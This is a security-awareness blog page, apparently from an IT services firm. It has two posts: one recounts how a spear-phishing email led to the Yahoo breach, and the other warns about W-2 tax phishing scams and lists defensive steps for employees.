      A Single Spear Phishing Click Caused the Yahoo Data Breach   A single click was all it took to launch one of the biggest data breaches ever.   One mistaken click. That's all it took for a Canadian hacker aligned with rogue Russian FSB spies to gain access to Yahoo's network and potentially the email messages and private information of as many as 1.5 billion people.  The U.S. Federal Bureau of Investigation has been investigating the intrusion for two years, but it was only in late 2016 that the full scale of the hack became apparent. On Wednesday, the FBI indicted four people for the attack, two of whom are rogue FSB spies who work for the division that is supposed to cooperate with America’s FBI on cybercrime investigations. (The FSB is the successor of the KGB).   Kremlin Intelligence Services Overlap With Russian Cybercrime Underworld  One of these two rogues, Dmitry Dokuchaev, was himself recently arrested on what the Moscow press calls “treason” charges for passing information to the CIA. In reality, Dokuchaev started out as a criminal hacker who moved to the FSB but never stopped his old tricks. He was just one of the many criminals working inside Russia’s intelligence bureaucracy, and for personal profit he sold information to intermediaries that ultimately found its way to the CIA. The investigation exposed rivalries inside the Kremlin intelligence establishment as well as inside the Russian cybercrime underworld with which it overlaps. Dokuchaev was part of the Shaltai-Boltai, a hacker group that exploits stolen data to embarrass and blackmail Russian politicians and business officials.   Here's how the FBI says they did it:  The hack began with a spear phishing email sent in early 2014 to a Yahoo company employee. It's unclear how many employees were targeted and how many emails were sent, but it only takes one person to click on a link, and it happened.  Unimaginable that Yahoo did not sufficiently step employees through new-school security awareness training to prevent disasters like this.  It was all over the press, but CSO had the best story about, with more detail, background and even video:  http://www.csoonline.com/article/3180762/data-breach/inside-the-russian-hack-of-yahoo-how-they-did-it.html   Check out the new SkyPort IT service that can test and train your employees to do the right with these inbound threats ... go to https://www.skyport-it.com/phishing  Best Regards, Dan   PS - CHECK OUT OUR USEFUL INFO-STATION (CLICK HERE)

Comment

A single click was all it took to launch one of the biggest data breaches ever.

Comment

      Scam Of The Week: New FBI and IRS Alerts Against W-2 Phishing  There is a wave of W-2 phishing attacks going on. We see these coming in through thousands of reported scam attempts via our Phishing Alert Button. The FBI and the IRS have repeatedly posted warnings that these attacks have started early and that the volume has gone up significantly this year.  Remember those Nigerian prince emails? They are also called 'Nigerian 419' scams because the first wave of them came from Nigeria. The ' 419 ' part of the name comes from the section of Nigeria's Criminal Code which outlaws the practice. Well, those gangs have all "growed up" and they are now behind many of today's W-2 scams. It is surprisingly easy to do a little bit of research and send a spoofed email that looks like it is from the CEO.  These W-2 scams are hitting everywhere, even a Cyber Security Contractor was hit with one of these. On Thursday, March 16, the CEO of Defense Point Security, LLC — a Virginia company that bills itself as “the choice provider of cyber security services to the federal government” — told all employees that their W-2 tax data was handed directly to fraudsters after someone inside the company fell for a W-2 spear phishing attack. OUCH!   What To Do About It    I  strongly  suggest you send this to all employees, and mark it as  important  for all staff in HR, Legal and Accounting. You're welcome to copy/paste/edit:     "This year, authorities are warning about a massive wave of W-2 tax form phishing scams. Cyber criminals are sending "spoofed" emails that look like they come from the CEO or another C-level executive and ask for a PDF with the W-2 tax information of all employees. The W-2's have all the information needed to file fraudulent tax returns and steal anyone's identity.  Here are five steps to prevent an incredible amount of hassle and possible damage:   If you receive any email requesting any kind of W-2 tax information, pick up the phone and verify that request before you email anything to anybody.  File your taxes at the state and federal level as quickly as you can, or file for an October 16 extension early,  before  the bad guys can file a bogus claim.  Consider filing form 14039 and request an IP PIN from the government. Form 14039 requires you to state you believe you are likely to be a victim of identity fraud. Even if cyber criminals haven’t tried to file a bogus tax return in your name, virtually every American's data has been stolen which can lead to your identity being stolen.  Every 4 months, get a free once-a-year credit report from the three major credit bureaus. Get them on your calendar (cycle through them) and dispute any unauthorized activity.  Place a "security freeze" or "credit freeze" on your files with all three credit bureaus to prevent ID thieves from assuming your identity and open up a line of credit in your name.    This time of year, it is more important than ever to Think Before You Click!   Best Regards,  Dan

Comment

Scam Of The Week: New FBI and IRS Alerts Against W-2 Phishing

Comment